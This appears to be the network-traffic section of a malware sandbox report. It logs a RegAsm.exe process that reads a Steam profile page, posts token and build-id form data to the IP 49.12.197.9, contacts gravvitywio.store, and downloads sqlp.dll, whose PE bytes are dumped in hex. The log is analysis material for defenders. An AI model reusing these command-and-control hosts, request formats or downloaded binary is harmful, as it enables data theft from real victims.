                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:43:29 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                          Host: steamcommunity.com
                                                                                                                                                                                                                                          2024-10-02 12:43:29 UTC1870INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                          Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:29 GMT
                                                                                                                                                                                                                                          Content-Length: 34837
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Set-Cookie: sessionid=b867f79093eafc0cafb57d74; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                          Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                          2024-10-02 12:43:29 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                                                                                                                                                                          2024-10-02 12:43:29 UTC16384INData Raw: 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 09 09 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0d 0a 09 09 09 24 28 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 27 29 2e 76 5f 74 6f 6f 6c 74 69 70 28 7b 27 6c 6f 63 61 74 69 6f 6e 27 3a 27 62 6f 74 74 6f 6d 27 2c 20 27 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f
                                                                                                                                                                                                                                          Data Ascii: <script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#glo
                                                                                                                                                                                                                                          2024-10-02 12:43:29 UTC3768INData Raw: 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 73 75 6d 6d 61 72 79 5f 66 6f 6f 74 65 72 22 3e 0d 0a 09 09 09 09 09 09 09 3c 73 70 61 6e 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29
                                                                                                                                                                                                                                          Data Ascii: <div class="profile_summary_footer"><span data-panel="{&quot;focusable&quot;:true,&quot;clickOnActivate&quot;:true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function()
                                                                                                                                                                                                                                          2024-10-02 12:43:29 UTC171INData Raw: 09 3c 73 70 61 6e 3e 56 69 65 77 20 6d 6f 62 69 6c 65 20 77 65 62 73 69 74 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 0d 0a 09 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                          Data Ascii: <span>View mobile website</span></div></div></div></div>... responsive_page_content --></div>... responsive_page_frame --></body></html>


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          26192.168.2.65854249.12.197.94436208C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:43:29 UTC277OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----IIJDBAKKKFBFHIDGIIEH
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                          Host: 49.12.197.9
                                                                                                                                                                                                                                          Content-Length: 7265
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          2024-10-02 12:43:29 UTC7265OUTData Raw: 2d 2d 2d 2d 2d 2d 49 49 4a 44 42 41 4b 4b 4b 46 42 46 48 49 44 47 49 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 62 34 65 64 66 38 31 36 61 64 33 66 33 63 65 61 39 39 36 65 35 61 61 39 62 33 30 31 63 61 30 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 44 42 41 4b 4b 4b 46 42 46 48 49 44 47 49 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 62 34 64 34 37 35 38 36 38 37 34 62 30 38 39 34 37 32 30 33 66 30 33 65 34 64 62 33 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 44 42 41 4b 4b 4b 46 42 46 48 49 44 47 49 49 45 48 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                          Data Ascii: ------IIJDBAKKKFBFHIDGIIEHContent-Disposition: form-data; name="token"3b4edf816ad3f3cea996e5aa9b301ca0------IIJDBAKKKFBFHIDGIIEHContent-Disposition: form-data; name="build_id"8b4d47586874b08947203f03e4db3962------IIJDBAKKKFBFHIDGIIEHCont
                                                                                                                                                                                                                                          2024-10-02 12:43:30 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:30 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          2024-10-02 12:43:30 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          27192.168.2.658543104.21.16.124436904C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:43:30 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                          Content-Length: 8
                                                                                                                                                                                                                                          Host: gravvitywio.store
                                                                                                                                                                                                                                          2024-10-02 12:43:30 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                          Data Ascii: act=life
                                                                                                                                                                                                                                          2024-10-02 12:43:30 UTC774INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:30 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=agu19dhmikuaqbb7go2lu7qh55; expires=Sun, 26 Jan 2025 06:30:09 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wbkoqEIUH7ps3dN%2Fd689KvUfFmo48mAw7L3zzv2uLqiXWe5%2Bqr4LZSO81RNwG2lwTnXe8o9AG9U5DtkvW0ajAP%2BaJizDEzHE0mYjqqbIk489WFJTOIxQi5UDFdylMFbTOmMfBQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c74a1a041784-EWR
                                                                                                                                                                                                                                          2024-10-02 12:43:30 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                                                                                                          Data Ascii: aerror #D12
                                                                                                                                                                                                                                          2024-10-02 12:43:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          28192.168.2.65854449.12.197.94436208C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:43:30 UTC192OUTGET /sqlp.dll HTTP/1.1
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                          Host: 49.12.197.9
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          2024-10-02 12:43:31 UTC264INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:31 GMT
                                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                                          Content-Length: 2459136
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Last-Modified: Wednesday, 02-Oct-2024 12:43:31 GMT
                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                          2024-10-02 12:43:31 UTC16120INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00
                                                                                                                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
                                                                                                                                                                                                                                          2024-10-02 12:43:31 UTC16384INData Raw: d3 b2 1e 00 e9 9c 25 1b 00 e9 3a f0 19 00 e9 9e cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                                                                                          Data Ascii: %:X~e!*FW|>|L1146
                                                                                                                                                                                                                                          2024-10-02 12:43:31 UTC16384INData Raw: 24 10 8b c3 0f 1f 40 00 8a 10 3a 11 75 1a 84 d2 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53
                                                                                                                                                                                                                                          Data Ascii: $@:utP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhS
                                                                                                                                                                                                                                          2024-10-02 12:43:31 UTC16384INData Raw: 83 f9 39 77 12 8d 1c 9b 46 8d 5b e8 8d 1c 59 0f be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35
                                                                                                                                                                                                                                          Data Ascii: 9wF[Y0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB|$-tDt$pV9"WfD$hL$lt$hT$5
                                                                                                                                                                                                                                          2024-10-02 12:43:31 UTC16384INData Raw: 89 4c 24 20 89 44 24 24 3b c2 7f 0c 7c 18 8b 44 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e
                                                                                                                                                                                                                                          Data Ascii: L$ D$$;|D$;sD$D$ T$$"$D$k;l$$|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP|$4L$ l$8j|$L$8QW@L$,9L$<|
                                                                                                                                                                                                                                          2024-10-02 12:43:31 UTC16384INData Raw: 8b 7c 24 10 be 07 00 00 00 eb 32 c7 40 08 01 00 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                                                                                          Data Ascii: |$2@3@f@D$VF@:'|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
                                                                                                                                                                                                                                          2024-10-02 12:43:31 UTC16384INData Raw: 24 10 83 c4 04 85 f6 74 64 8b 7c 24 14 e9 68 fe ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                                                                                          Data Ascii: $td|$hT$L$$l$ GT$GL$L$T$_^][_^]3[
                                                                                                                                                                                                                                          2024-10-02 12:43:31 UTC16384INData Raw: fe ff 83 c4 18 5f 5e 5d 5b 59 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14
                                                                                                                                                                                                                                          Data Ascii: _^][YVt$W|$FVBhtw7t7Vg_^jjjh,g!t$
                                                                                                                                                                                                                                          2024-10-02 12:43:31 UTC16384INData Raw: 1c 89 4a 2c ff 46 2c 5e c3 8b 4c 24 0c 33 d2 8b 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00
                                                                                                                                                                                                                                          Data Ascii: J,F,^L$3qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^|$u|$u_^3ARt$t$PA8tuL$
                                                                                                                                                                                                                                          2024-10-02 12:43:31 UTC16384INData Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4
                                                                                                                                                                                                                                          Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW|$mw<(6XvutT9 $tB8$tPh $VD $)$
